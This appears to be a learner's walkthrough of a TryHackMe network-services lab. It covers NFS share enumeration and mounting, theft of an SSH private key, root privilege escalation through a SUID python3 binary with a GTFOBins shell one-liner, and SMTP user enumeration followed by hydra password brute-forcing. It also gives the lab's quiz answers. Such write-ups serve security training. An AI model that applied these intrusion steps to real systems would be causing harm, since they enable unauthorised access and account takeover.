# Try Hack Me | network-services #2

## NFS

### UNDERSTANDING

* NFS stands for `Network File System`
*  What process allows an NFS client to interact with a remote directory as though it was a physical device? `mounting`
* What does NFS use to represent files and directories on the server? `file handle` that specifies files and folders on host machine 
* What protocol does NFS use to communicate between the server and client? `RPC` (remote procedure call)

If someone wants to access a file using NFS, an RPC call is placed to NFSD (the NFS daemon) on the server. This call takes parameters such as:

     The file handle
     The name of the file to be accessed
     The user's, user ID
     The user's group ID

* What two pieces of user data does the NFS server take as parameters for controlling user permissions? Format: parameter 1 / parameter 2 `user id / group id`
* Can it share files with XXX client? `yes with any client`
* What is the latest version of NFS? [released in 2016, but is still up to date as of 2020] This will require external research. `4.2`

### ENUMERATION

used normal nmap found nfs (unexpected wow)
as an attempt to learn nmap scripts
I used `nmap --script nfs-showmount 10.10.102.231 -p 2049,111`
that got me `/home`

I mounted it with `sudo mount -t nfs IP:/home /tmp/mount/ -nolock`
and looked around
there was an .ssh inside `cappucino` with `id_rsa`
that enabled ssh connection

### EXPLOIT

so now we can connect with ssh but there is no way to get root
but we can create our suid python and after that do SUID gtfobins for python

local:
copy python3 to current working directory and chmod +s to set suid
then chown root to change owner to root
remote:
with all that we ssh in and run
```bash
./python3 -c 'import os; os.execl("/bin/sh", "sh", "-p")'
```
that sould grant us root access


## SMTP

### ENUMERATION

used normal nmap found smtp (unexpected wow) 
via msfconsole smtp_version and smtp_enumuser found `administrator` user

### EXPLOIT

and with hydra got `alejandro` password

